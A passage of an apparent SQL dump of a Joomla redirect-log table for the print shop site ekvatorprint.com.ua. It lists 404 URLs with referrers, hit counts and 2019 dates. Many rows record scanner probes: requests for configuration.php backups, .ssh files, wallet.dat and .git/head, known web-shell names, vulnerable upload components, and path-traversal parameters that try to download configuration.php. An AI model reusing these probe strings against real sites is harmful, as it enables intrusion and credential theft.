00:00:00',301),(14307,'http://ekvatorprint.com.ua/configuration-backup',NULL,'','',1,0,'2019-01-28 10:53:32','0000-00-00 00:00:00',301),(14308,'http://ekvatorprint.com.ua/configuration.data',NULL,'','',1,0,'2019-01-28 10:53:37','0000-00-00 00:00:00',301),(14309,'http://ekvatorprint.com.ua/configuration.backup',NULL,'','',1,0,'2019-01-28 10:53:41','0000-00-00 00:00:00',301),(14310,'http://ekvatorprint.com.ua/configuration.php~~',NULL,'','',1,0,'2019-01-28 10:53:42','0000-00-00 00:00:00',301),(14311,'http://ekvatorprint.com.ua/configuration.phpb',NULL,'','',1,0,'2019-01-28 10:53:44','0000-00-00 00:00:00',301),(14312,'http://ekvatorprint.com.ua/configuration.phpc',NULL,'','',1,0,'2019-01-28 10:53:45','0000-00-00 00:00:00',301),(14313,'http://ekvatorprint.com.ua/configuration ',NULL,'','',1,0,'2019-01-28 10:53:47','0000-00-00 00:00:00',301),(14314,'http://ekvatorprint.com.ua/configuration.cfg',NULL,'','',1,0,'2019-01-28 10:53:50','0000-00-00 00:00:00',301),(14315,'http://ekvatorprint.com.ua/config.php~~',NULL,'','',1,0,'2019-01-28 10:53:51','0000-00-00 00:00:00',301),(14316,'http://ekvatorprint.com.ua/configuration.php~~~',NULL,'','',1,0,'2019-01-28 10:53:52','0000-00-00 00:00:00',301),(14317,'http://ekvatorprint.com.ua/configuration.phptmp',NULL,'','',1,0,'2019-01-28 10:53:53','0000-00-00 00:00:00',301),(14318,'http://ekvatorprint.com.ua/configuration-sample.php~',NULL,'','',1,0,'2019-01-28 10:53:55','0000-00-00 00:00:00',301),(14319,'http://ekvatorprint.com.ua/configuration.phpbak',NULL,'','',1,0,'2019-01-28 10:53:56','0000-00-00 00:00:00',301),(14320,'http://ekvatorprint.com.ua/configuration.prod.php.txt',NULL,'','',1,0,'2019-01-28 10:53:57','0000-00-00 00:00:00',301),(14321,'http://ekvatorprint.com.ua/configuration.php_old',NULL,'','',1,0,'2019-01-28 10:53:58','0000-00-00 00:00:00',301),(14322,'http://ekvatorprint.com.ua/kak-podtverdi-oplatu-za-zakaz',NULL,'','',1,0,'2019-01-28 13:36:15','0000-00-00 00:00:00',301),(14323,'http://ekvatorprint.com.ua/printing-on-canvas/templates/gk_ilife/favicon.ico',NULL,'','',37,0,'2019-01-28 14:03:28','0000-00-00 00:00:00',301),(14324,'http://ekvatorprint.com.ua/index.php?option=com_vreview&view=users',NULL,'http://ekvatorprint.com.ua//index.php?option=com_vreview&view=users','',1,0,'2019-01-30 07:25:45','0000-00-00 00:00:00',301),(14325,'http://ekvatorprint.com.ua/users-online/',NULL,'http://buspar10.com','',1,0,'2019-01-30 15:00:22','0000-00-00 00:00:00',301),(14326,'http://ekvatorprint.com.ua/service-worker.js',NULL,'','',1,0,'2019-01-31 04:06:23','0000-00-00 00:00:00',301),(14327,'http://ekvatorprint.com.ua/sw.js',NULL,'','',1,0,'2019-01-31 04:06:25','0000-00-00 00:00:00',301),(14328,'http://ekvatorprint.com.ua/price',NULL,'http://ekvatorprint.com.ua/','',2,0,'2019-01-31 10:52:16','0000-00-00 00:00:00',301),(14329,'http://ekvatorprint.com.ua/.wget-hsts',NULL,'','',2,0,'2019-01-31 13:56:54','0000-00-00 00:00:00',301),(14330,'http://ekvatorprint.com.ua/temp/bitcoin/wallet.dat',NULL,'','',1,0,'2019-02-01 02:10:24','0000-00-00 00:00:00',301),(14331,'http://ekvatorprint.com.ua/temp/wallet.dat',NULL,'','',1,0,'2019-02-01 02:10:43','0000-00-00 00:00:00',301),(14332,'http://ekvatorprint.com.ua/oihfoe09fposf.php',NULL,'ekvatorprint.com.ua','',2,0,'2019-02-02 08:41:38','0000-00-00 00:00:00',301),(14333,'http://ekvatorprint.com.ua/jwlsjd_baaqifg.php',NULL,'ekvatorprint.com.ua','',2,0,'2019-02-04 16:32:06','0000-00-00 00:00:00',301),(14334,'http://ekvatorprint.com.ua/configuration.php_',NULL,'','',1,0,'2019-02-05 13:28:58','0000-00-00 00:00:00',301),(14335,'http://ekvatorprint.com.ua/configuration.php.in',NULL,'','',1,0,'2019-02-05 13:28:59','0000-00-00 00:00:00',301),(14336,'http://ekvatorprint.com.ua/configuration.php.sample',NULL,'','',1,0,'2019-02-05 13:29:00','0000-00-00 00:00:00',301),(14337,'http://ekvatorprint.com.ua/configuration.local.php',NULL,'','',1,0,'2019-02-05 13:29:04','0000-00-00 00:00:00',301),(14338,'http://ekvatorprint.com.ua/configuration.phpn',NULL,'','',1,0,'2019-02-05 13:29:32','0000-00-00 00:00:00',301),(14339,'http://ekvatorprint.com.ua/configuration.php~~~~',NULL,'','',1,0,'2019-02-05 13:29:34','0000-00-00 00:00:00',301),(14340,'http://ekvatorprint.com.ua/configuration-sample.php.bak',NULL,'','',1,0,'2019-02-05 13:29:36','0000-00-00 00:00:00',301),(14341,'http://ekvatorprint.com.ua/configuration.php.backup.txt',NULL,'','',1,0,'2019-02-05 13:29:39','0000-00-00 00:00:00',301),(14342,'http://ekvatorprint.com.ua/configuration-sample.php~~',NULL,'','',1,0,'2019-02-05 13:29:44','0000-00-00 00:00:00',301),(14343,'http://ekvatorprint.com.ua/configuration.phpo',NULL,'','',1,0,'2019-02-05 13:29:45','0000-00-00 00:00:00',301),(14344,'http://ekvatorprint.com.ua/configuration.phpd',NULL,'','',1,0,'2019-02-05 13:29:46','0000-00-00 00:00:00',301),(14345,'http://ekvatorprint.com.ua/configuration.phpe',NULL,'','',1,0,'2019-02-05 13:29:48','0000-00-00 00:00:00',301),(14346,'http://ekvatorprint.com.ua/configuration.php.com',NULL,'','',1,0,'2019-02-05 13:29:48','0000-00-00 00:00:00',301),(14347,'http://ekvatorprint.com.ua/configuration.php.us',NULL,'','',1,0,'2019-02-05 13:29:50','0000-00-00 00:00:00',301),(14348,'http://ekvatorprint.com.ua/configuration.php.org',NULL,'','',1,0,'2019-02-05 13:29:53','0000-00-00 00:00:00',301),(14349,'http://ekvatorprint.com.ua/configuration.php.uk',NULL,'','',1,0,'2019-02-05 13:29:54','0000-00-00 00:00:00',301),(14350,'http://ekvatorprint.com.ua/configuration.php-o',NULL,'','',1,0,'2019-02-05 13:29:55','0000-00-00 00:00:00',301),(14351,'http://ekvatorprint.com.ua/bb-config.php.bak',NULL,'','',1,0,'2019-02-05 13:29:56','0000-00-00 00:00:00',301),(14352,'http://ekvatorprint.com.ua/configuration.php.resetwp_bak',NULL,'','',1,0,'2019-02-05 13:29:57','0000-00-00 00:00:00',301),(14353,'http://ekvatorprint.com.ua/configuration.php1',NULL,'','',1,0,'2019-02-05 13:29:58','0000-00-00 00:00:00',301),(14354,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/clean.php',NULL,'','',1,0,'2019-02-05 13:36:27','0000-00-00 00:00:00',301),(14355,'http://ekvatorprint.com.ua/libraries/joomla/jmails.php?u',NULL,'','',1,0,'2019-02-05 13:36:38','0000-00-00 00:00:00',301),(14356,'http://ekvatorprint.com.ua/olux.php',NULL,'','',1,0,'2019-02-05 13:37:08','0000-00-00 00:00:00',301),(14357,'http://ekvatorprint.com.ua/indoxploit.php',NULL,'','',1,0,'2019-02-05 13:37:10','0000-00-00 00:00:00',301),(14358,'http://ekvatorprint.com.ua/rxr.php',NULL,'','',1,0,'2019-02-05 13:37:20','0000-00-00 00:00:00',301),(14359,'http://ekvatorprint.com.ua/v5.php',NULL,'','',1,0,'2019-02-05 13:37:40','0000-00-00 00:00:00',301),(14360,'http://ekvatorprint.com.ua/templates/beez_3/index.php',NULL,'','',1,0,'2019-02-05 13:39:47','0000-00-00 00:00:00',301),(14361,'http://ekvatorprint.com.ua/a.php',NULL,'','',1,0,'2019-02-05 13:39:54','0000-00-00 00:00:00',301),(14362,'http://ekvatorprint.com.ua/z.php',NULL,'','',1,0,'2019-02-05 13:40:17','0000-00-00 00:00:00',301),(14363,'http://ekvatorprint.com.ua/o.php',NULL,'','',1,0,'2019-02-05 13:40:25','0000-00-00 00:00:00',301),(14364,'http://ekvatorprint.com.ua/t.php',NULL,'','',1,0,'2019-02-05 13:40:32','0000-00-00 00:00:00',301),(14365,'http://ekvatorprint.com.ua/2018.php',NULL,'','',1,0,'2019-02-05 13:40:46','0000-00-00 00:00:00',301),(14366,'http://ekvatorprint.com.ua/y.php',NULL,'','',1,0,'2019-02-05 13:41:04','0000-00-00 00:00:00',301),(14367,'http://ekvatorprint.com.ua/e.php',NULL,'','',1,0,'2019-02-05 13:41:13','0000-00-00 00:00:00',301),(14368,'http://ekvatorprint.com.ua/m.php',NULL,'','',1,0,'2019-02-05 13:41:21','0000-00-00 00:00:00',301),(14369,'http://ekvatorprint.com.ua/root.php',NULL,'','',1,0,'2019-02-05 13:41:58','0000-00-00 00:00:00',301),(14370,'http://ekvatorprint.com.ua/1337w0rm.php',NULL,'','',1,0,'2019-02-05 13:42:04','0000-00-00 00:00:00',301),(14371,'http://ekvatorprint.com.ua/2019.php',NULL,'','',1,0,'2019-02-05 13:42:07','0000-00-00 00:00:00',301),(14372,'http://ekvatorprint.com.ua//images/krd.txt',NULL,'','',1,0,'2019-02-05 14:16:07','0000-00-00 00:00:00',301),(14373,'http://ekvatorprint.com.ua//images/sniper.txt',NULL,'','',1,0,'2019-02-05 14:16:12','0000-00-00 00:00:00',301),(14374,'http://ekvatorprint.com.ua//images/s.txt',NULL,'','',1,0,'2019-02-05 14:16:20','0000-00-00 00:00:00',301),(14375,'http://ekvatorprint.com.ua//images/1998.txt',NULL,'','',1,0,'2019-02-05 14:16:21','0000-00-00 00:00:00',301),(14376,'http://ekvatorprint.com.ua/.ssh/config',NULL,'','',1,0,'2019-02-06 18:33:04','0000-00-00 00:00:00',301),(14377,'http://ekvatorprint.com.ua/rss/catalog/notifystock/',NULL,'','',2,0,'2019-02-07 00:42:57','0000-00-00 00:00:00',301),(14378,'http://ekvatorprint.com.ua/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1549775086083',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2019-02-10 05:04:46','0000-00-00 00:00:00',301),(14379,'http://ekvatorprint.com.ua/mailto:e@ekvatorprint.com.ua',NULL,'ekvatorprint.com.ua','',1,0,'2019-02-11 09:42:32','0000-00-00 00:00:00',301),(14380,'http://ekvatorprint.com.ua/.ssh/known_hosts',NULL,'','',1,0,'2019-02-12 03:17:03','0000-00-00 00:00:00',301),(14381,'http://ekvatorprint.com.ua/horde/imp/test.php',NULL,'','',3,0,'2019-02-13 01:08:47','0000-00-00 00:00:00',301),(14382,'http://ekvatorprint.com.ua/horde3/imp/test.php',NULL,'','',3,0,'2019-02-13 01:08:56','0000-00-00 00:00:00',301),(14383,'http://ekvatorprint.com.ua/imp/test.php',NULL,'','',3,0,'2019-02-13 01:09:01','0000-00-00 00:00:00',301),(14384,'http://ekvatorprint.com.ua/cometchat/js/index.html',NULL,'','',1,0,'2019-02-14 18:02:37','0000-00-00 00:00:00',301),(14385,'http://ekvatorprint.com.ua/css/main.css',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2019-02-20 09:08:52','0000-00-00 00:00:00',301),(14386,'http://ekvatorprint.com.ua/img/service_equipment_change_mac_ukr.jpg',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2019-02-20 09:08:52','0000-00-00 00:00:00',301),(14387,'http://ekvatorprint.com.ua/js/opt82.js',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2019-02-20 09:08:52','0000-00-00 00:00:00',301),(14388,'http://ekvatorprint.com.ua/img/service_equipment_change_mac_rus.jpg',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2019-02-20 09:08:52','0000-00-00 00:00:00',301),(14389,'http://ekvatorprint.com.ua/img/mts.png',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2019-02-20 09:08:52','0000-00-00 00:00:00',301),(14390,'http://ekvatorprint.com.ua/img/life.png',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2019-02-20 09:08:52','0000-00-00 00:00:00',301),(14391,'http://ekvatorprint.com.ua/img/kyivstar.png',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2019-02-20 09:08:52','0000-00-00 00:00:00',301),(14392,'http://ekvatorprint.com.ua/76305bd972997f4036de6044deafce09',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2019-02-21 08:54:13','0000-00-00 00:00:00',301),(14393,'http://ekvatorprint.com.ua/components/com_sexycontactform/fileupload/',NULL,'','',2,0,'2019-02-24 08:17:09','0000-00-00 00:00:00',301),(14394,'http://ekvatorprint.com.ua/plug/oem/aspcms_oemfun.asp',NULL,'','',1,0,'2019-02-24 16:24:26','0000-00-00 00:00:00',301),(14395,'http://ekvatorprint.com.ua/web/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:29','0000-00-00 00:00:00',301),(14396,'http://ekvatorprint.com.ua/website/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:30','0000-00-00 00:00:00',301),(14397,'http://ekvatorprint.com.ua/news/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:30','0000-00-00 00:00:00',301),(14398,'http://ekvatorprint.com.ua/2015/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:30','0000-00-00 00:00:00',301),(14399,'http://ekvatorprint.com.ua/2016/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:30','0000-00-00 00:00:00',301),(14400,'http://ekvatorprint.com.ua/2017/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:30','0000-00-00 00:00:00',301),(14401,'http://ekvatorprint.com.ua/2018/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:30','0000-00-00 00:00:00',301),(14402,'http://ekvatorprint.com.ua/shop/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:30','0000-00-00 00:00:00',301),(14403,'http://ekvatorprint.com.ua/wp1/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:31','0000-00-00 00:00:00',301),(14404,'http://ekvatorprint.com.ua/test/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:31','0000-00-00 00:00:00',301),(14405,'http://ekvatorprint.com.ua/media/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:31','0000-00-00 00:00:00',301),(14406,'http://ekvatorprint.com.ua/wp2/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:31','0000-00-00 00:00:00',301),(14407,'http://ekvatorprint.com.ua/sito/wp-includes/wlwmanifest.xml',NULL,'','',8,0,'2019-02-25 01:39:31','0000-00-00 00:00:00',301),(14408,'http://ekvatorprint.com.ua/administrator//media/vuln.txt',NULL,'','',1,0,'2019-02-26 17:38:14','0000-00-00 00:00:00',301),(14409,'http://ekvatorprint.com.ua/administrator/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',1,0,'2019-02-26 17:39:03','0000-00-00 00:00:00',301),(14410,'http://ekvatorprint.com.ua/administrator/components/com_sexycontactform/fileupload/',NULL,'','',1,0,'2019-02-26 17:39:06','0000-00-00 00:00:00',301),(14411,'http://ekvatorprint.com.ua/administrator/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',1,0,'2019-02-26 17:39:32','0000-00-00 00:00:00',301),(14412,'http://ekvatorprint.com.ua/administrator/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',1,0,'2019-02-26 17:39:34','0000-00-00 00:00:00',301),(14413,'http://ekvatorprint.com.ua/administrator/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',1,0,'2019-02-26 17:39:38','0000-00-00 00:00:00',301),(14414,'http://ekvatorprint.com.ua/banner-printingtp=1',NULL,'','',1,0,'2019-02-27 10:24:49','0000-00-00 00:00:00',301),(14415,'http://ekvatorprint.com.ua/tp=1',NULL,'','',1,0,'2019-02-27 10:25:07','0000-00-00 00:00:00',301),(14416,'http://ekvatorprint.com.ua/robots_ssl.txt',NULL,'','',86,0,'2019-03-01 09:56:31','0000-00-00 00:00:00',301),(14417,'http://ekvatorprint.com.ua/modules/mod_linkbiz/mod_linkbiz.php',NULL,'','',1,0,'2019-03-03 00:13:58','0000-00-00 00:00:00',301),(14418,'https://ekvatorprint.com.ua/google397c8356fc7fc0c3.html',NULL,'','',2,0,'2019-03-04 16:04:03','0000-00-00 00:00:00',301),(14419,'https://ekvatorprint.com.ua/google49c4d19078a75ec8.html',NULL,'','',2,0,'2019-03-04 16:04:04','0000-00-00 00:00:00',301),(14420,'http://ekvatorprint.com.ua/modules/mod_wp/mod_wp.php',NULL,'','',1,0,'2019-03-04 19:40:08','0000-00-00 00:00:00',301),(14421,'http://ekvatorprint.com.ua/dockerfile',NULL,'','',1,0,'2019-03-05 07:41:29','0000-00-00 00:00:00',301),(14422,'https://ekvatorprint.com.ua/dockerfile',NULL,'','',2,0,'2019-03-05 07:41:30','0000-00-00 00:00:00',301),(14423,'https://ekvatorprint.com.ua/jfhjkdshfdsfkjhdjfdjfhjskdhfeuwfewifhhdfjkfhkdjhfsdjkfhdjkfhdkfhdfhk',NULL,'http://ekvatorprint.com.ua/jfhjkdshfdsfkjhdjfdjfhjskdhfeuwfewifhhdfjkfhkdjhfsdjkfhdjkfhdkfhdfhk','',54,0,'2019-03-05 08:34:23','0000-00-00 00:00:00',301),(14424,'https://ekvatorprint.com.ua/canonical-link.html',NULL,'https://ekvatorprint.com.ua/delivery','',4,0,'2019-03-05 08:34:25','0000-00-00 00:00:00',301),(14425,'https://ekvatorprint.com.ua/sitemap.xml',NULL,'http://ekvatorprint.com.ua/sitemap.xml','',200,0,'2019-03-05 08:34:26','0000-00-00 00:00:00',301),(14426,'https://ekvatorprint.com.ua/sitemap_index.xml',NULL,'http://ekvatorprint.com.ua/sitemap_index.xml','',116,0,'2019-03-05 08:34:26','0000-00-00 00:00:00',301),(14427,'https://ekvatorprint.com.ua/sitemap.xml.gz',NULL,'http://ekvatorprint.com.ua/sitemap.xml.gz','',116,0,'2019-03-05 08:34:26','0000-00-00 00:00:00',301),(14428,'https://ekvatorprint.com.ua/sitemap_index.xml.gz',NULL,'http://ekvatorprint.com.ua/sitemap_index.xml.gz','',100,0,'2019-03-05 08:34:27','0000-00-00 00:00:00',301),(14429,'https://ekvatorprint.com.ua/sitemap.ashx',NULL,'http://ekvatorprint.com.ua/sitemap.ashx','',99,0,'2019-03-05 08:34:27','0000-00-00 00:00:00',301),(14430,'https://ekvatorprint.com.ua/sitemap',NULL,'http://ekvatorprint.com.ua/sitemap','',99,0,'2019-03-05 08:34:27','0000-00-00 00:00:00',301),(14431,'https://ekvatorprint.com.ua/apple-app-site-association',NULL,'','',122,0,'2019-03-05 13:39:40','0000-00-00 00:00:00',301),(14432,'http://ekvatorprint.com.ua/vacancies',NULL,'','',1,0,'2019-03-05 21:27:02','0000-00-00 00:00:00',301),(14433,'http://ekvatorprint.com.ua/openings',NULL,'','',1,0,'2019-03-05 21:27:07','0000-00-00 00:00:00',301),(14434,'http://ekvatorprint.com.ua/career',NULL,'http://ekvatorprint.com.ua/openings','',1,0,'2019-03-05 21:27:13','0000-00-00 00:00:00',301),(14435,'http://ekvatorprint.com.ua/apply',NULL,'http://ekvatorprint.com.ua/career','',1,0,'2019-03-05 21:27:18','0000-00-00 00:00:00',301),(14436,'https://ekvatorprint.com.ua/no8dd6roh6xq',NULL,'','',1,0,'2019-03-06 05:13:20','0000-00-00 00:00:00',301),(14437,'http://ekvatorprint.com.ua/wp-content/themes/headway-161/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-161/style.css','',3,0,'2019-03-06 14:58:08','0000-00-00 00:00:00',301),(14438,'http://ekvatorprint.com.ua/wp-content/themes/headway-163/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-163/style.css','',2,0,'2019-03-06 15:27:39','0000-00-00 00:00:00',301),(14439,'http://ekvatorprint.com.ua/templates/gk_ilife/css/icon_top.png',NULL,'https://ekvatorprint.com.ua/templates/gk_ilife/css/template_css.css','',4,0,'2019-03-07 08:25:58','0000-00-00 00:00:00',301),(14440,'https://ekvatorprint.com.ua/index.php?option=com_easyblog&view=dashboard&layout=write',NULL,'https://ekvatorprint.com.ua/','',706,0,'2019-03-07 17:04:40','0000-00-00 00:00:00',301),(14441,'https://ekvatorprint.com.ua/pyatikomponentnye-shablony-modulnykh-kartin',NULL,'','',158,0,'2019-03-08 03:49:40','0000-00-00 00:00:00',301),(14442,'https://ekvatorprint.com.ua/index.php?option=com_user&task=register',NULL,'','',40,0,'2019-03-08 10:37:36','0000-00-00 00:00:00',301),(14443,'https://ekvatorprint.com.ua/index.php/joomla/other-components/registration-form',NULL,'','',40,0,'2019-03-08 10:37:37','0000-00-00 00:00:00',301),(14444,'https://ekvatorprint.com.ua/wp-json/wp/v2/posts?per_page=1&page=1',NULL,'','',1,0,'2019-03-08 13:27:44','0000-00-00 00:00:00',301),(14445,'http://ekvatorprint.com.ua/wp-content/themes/headway-165/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-165/style.css','',2,0,'2019-03-08 15:51:26','0000-00-00 00:00:00',301),(14446,'https://ekvatorprint.com.ua/wp-includes/wlwmanifest.xml',NULL,'','',268,0,'2019-03-08 19:05:57','0000-00-00 00:00:00',301),(14447,'https://ekvatorprint.com.ua/xmlrpc.php?rsd',NULL,'','',3,0,'2019-03-08 19:05:57','0000-00-00 00:00:00',301),(14448,'https://ekvatorprint.com.ua/blog/wp-includes/wlwmanifest.xml',NULL,'','',273,0,'2019-03-08 19:05:57','0000-00-00 00:00:00',301),(14449,'https://ekvatorprint.com.ua/web/wp-includes/wlwmanifest.xml',NULL,'','',256,0,'2019-03-08 19:05:58','0000-00-00 00:00:00',301),(14450,'https://ekvatorprint.com.ua/wordpress/wp-includes/wlwmanifest.xml',NULL,'','',270,0,'2019-03-08 19:05:58','0000-00-00 00:00:00',301),(14451,'https://ekvatorprint.com.ua/website/wp-includes/wlwmanifest.xml',NULL,'','',244,0,'2019-03-08 19:05:58','0000-00-00 00:00:00',301),(14452,'https://ekvatorprint.com.ua/wp/wp-includes/wlwmanifest.xml',NULL,'','',269,0,'2019-03-08 19:05:58','0000-00-00 00:00:00',301),(14453,'https://ekvatorprint.com.ua/news/wp-includes/wlwmanifest.xml',NULL,'','',242,0,'2019-03-08 19:05:58','0000-00-00 00:00:00',301),(14454,'https://ekvatorprint.com.ua/2015/wp-includes/wlwmanifest.xml',NULL,'','',14,0,'2019-03-08 19:05:58','0000-00-00 00:00:00',301),(14455,'https://ekvatorprint.com.ua/2016/wp-includes/wlwmanifest.xml',NULL,'','',14,0,'2019-03-08 19:05:58','0000-00-00 00:00:00',301),(14456,'https://ekvatorprint.com.ua/2017/wp-includes/wlwmanifest.xml',NULL,'','',14,0,'2019-03-08 19:05:58','0000-00-00 00:00:00',301),(14457,'https://ekvatorprint.com.ua/2018/wp-includes/wlwmanifest.xml',NULL,'','',172,0,'2019-03-08 19:05:58','0000-00-00 00:00:00',301),(14458,'https://ekvatorprint.com.ua/shop/wp-includes/wlwmanifest.xml',NULL,'','',235,0,'2019-03-08 19:05:59','0000-00-00 00:00:00',301),(14459,'https://ekvatorprint.com.ua/wp1/wp-includes/wlwmanifest.xml',NULL,'','',251,0,'2019-03-08 19:05:59','0000-00-00 00:00:00',301),(14460,'https://ekvatorprint.com.ua/test/wp-includes/wlwmanifest.xml',NULL,'','',256,0,'2019-03-08 19:05:59','0000-00-00 00:00:00',301),(14461,'https://ekvatorprint.com.ua/media/wp-includes/wlwmanifest.xml',NULL,'','',172,0,'2019-03-08 19:05:59','0000-00-00 00:00:00',301),(14462,'https://ekvatorprint.com.ua/wp2/wp-includes/wlwmanifest.xml',NULL,'','',246,0,'2019-03-08 19:05:59','0000-00-00 00:00:00',301),(14463,'https://ekvatorprint.com.ua/site/wp-includes/wlwmanifest.xml',NULL,'','',272,0,'2019-03-08 19:05:59','0000-00-00 00:00:00',301),(14464,'https://ekvatorprint.com.ua/cms/wp-includes/wlwmanifest.xml',NULL,'','',274,0,'2019-03-08 19:05:59','0000-00-00 00:00:00',301),(14465,'https://ekvatorprint.com.ua/sito/wp-includes/wlwmanifest.xml',NULL,'','',239,0,'2019-03-08 19:05:59','0000-00-00 00:00:00',301),(14466,'https://ekvatorprint.com.ua/portfolio',NULL,'','',219,0,'2019-03-09 09:41:54','0000-00-00 00:00:00',301),(14467,'https://ekvatorprint.com.ua/robots_ssl.t',NULL,'','',498,0,'2019-03-10 10:53:43','0000-00-00 00:00:00',301),(14468,'http://ekvatorprint.com.ua/https://ekvatorprint.com.ua/images/modulnie kartini/мк-129.png',NULL,'','',57,0,'2019-03-11 09:45:50','0000-00-00 00:00:00',301),(14469,'http://ekvatorprint.com.ua/https:/ekvatorprint.com.ua/images/modulnie kartini/мк-129.png',NULL,'','',1,0,'2019-03-11 11:00:34','0000-00-00 00:00:00',301),(14470,'https://ekvatorprint.com.ua/outdoor advertising',NULL,'','',1,0,'2019-03-11 12:08:52','0000-00-00 00:00:00',301),(14471,'https://ekvatorprint.com.ua/p		<!--',NULL,'http://ekvatorprint.com.ua/p%09%09%3C!--','',1,0,'2019-03-11 13:44:59','0000-00-00 00:00:00',301),(14472,'https://ekvatorprint.com.ua/printing-in-doneck/',NULL,'http://ekvatorprint.com.ua/printing-in-doneck/','',78,0,'2019-03-11 16:56:09','0000-00-00 00:00:00',301),(14473,'https://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin',NULL,'http://ekvatorprint.com.ua/trekhkomponentnye-shablony-modulnykh-kartin','',8,0,'2019-03-11 17:12:51','0000-00-00 00:00:00',301),(14474,'https://ekvatorprint.com.ua/p<!--',NULL,'http://ekvatorprint.com.ua/p%3C!--','',3,0,'2019-03-12 02:50:26','0000-00-00 00:00:00',301),(14475,'https://ekvatorprint.com.ua/print-ceilings',NULL,'http://ekvatorprint.com.ua/print-ceilings','',13,0,'2019-03-12 04:08:57','0000-00-00 00:00:00',301),(14476,'https://ekvatorprint.com.ua/portfolio/category/5-setki',NULL,'http://ekvatorprint.com.ua/portfolio/category/5-setki','',5,0,'2019-03-12 04:26:59','0000-00-00 00:00:00',301),(14477,'https://ekvatorprint.com.ua/services',NULL,'http://ekvatorprint.com.ua/services','',20,0,'2019-03-12 04:27:08','0000-00-00 00:00:00',301),(14478,'https://ekvatorprint.com.ua/chetyrekhkomponentnye-shablony-modulnykh-kartin',NULL,'http://ekvatorprint.com.ua/chetyrekhkomponentnye-shablony-modulnykh-kartin','',10,0,'2019-03-12 05:58:08','0000-00-00 00:00:00',301),(14479,'https://ekvatorprint.com.ua/index.php?itemid=6&id=5&option=com_content&view=article',NULL,'http://ekvatorprint.com.ua/index.php?Itemid=6&id=5&option=com_content&view=article','',1,0,'2019-03-12 06:01:53','0000-00-00 00:00:00',301),(14480,'https://ekvatorprint.com.ua/google8c6a1b07c3601620.html',NULL,'','',35,0,'2019-03-12 17:38:08','0000-00-00 00:00:00',301),(14481,'https://ekvatorprint.com.ua/?option=com_content&view=frontpage',NULL,'http://ekvatorprint.com.ua/?option=com_content&view=frontpage','',5,0,'2019-03-12 22:52:59','0000-00-00 00:00:00',301),(14482,'https://ekvatorprint.com.ua/.git/head',NULL,'','',36,0,'2019-03-13 18:46:48','0000-00-00 00:00:00',301),(14483,'https://ekvatorprint.com.ua/wp-content/themes/satoshi/upload-file.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/satoshi/upload-file.php','',2,0,'2019-03-14 05:03:35','0000-00-00 00:00:00',301),(14484,'https://ekvatorprint.com.ua/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',68,0,'2019-03-14 06:22:00','0000-00-00 00:00:00',301),(14485,'https://ekvatorprint.com.ua/index.php?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',31,0,'2019-03-14 06:22:24','0000-00-00 00:00:00',301),(14486,'https://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',23,0,'2019-03-14 06:22:36','0000-00-00 00:00:00',301),(14487,'https://ekvatorprint.com.ua/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',54,0,'2019-03-14 06:23:09','0000-00-00 00:00:00',301),(14488,'https://ekvatorprint.com.ua/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',39,0,'2019-03-14 06:23:50','0000-00-00 00:00:00',301),(14489,'https://ekvatorprint.com.ua/index.php?option=com_myblog&task=ajaxupload',NULL,'','',33,0,'2019-03-14 06:24:30','0000-00-00 00:00:00',301),(14490,'https://ekvatorprint.com.ua/index.php?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',33,0,'2019-03-14 06:25:02','0000-00-00 00:00:00',301),(14491,'https://ekvatorprint.com.ua/mrksj3q1wahzwrcux2n4otq8wlu',NULL,'','',1,0,'2019-03-15 06:12:17','0000-00-00 00:00:00',301),(14492,'https://ekvatorprint.com.ua/?option=com_content&view=article&id=16&itemid=17',NULL,'','',25,0,'2019-03-15 13:42:14','0000-00-00 00:00:00',301),(14493,'https://ekvatorprint.com.ua/\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-03-15 14:47:40','0000-00-00 00:00:00',301),(14494,'https://ekvatorprint.com.ua/undefined?0.23409940836102683',NULL,'','',1,0,'2019-03-15 15:34:21','0000-00-00 00:00:00',301),(14495,'https://ekvatorprint.com.ua/xmlrpc.php',NULL,'','',124,0,'2019-03-15 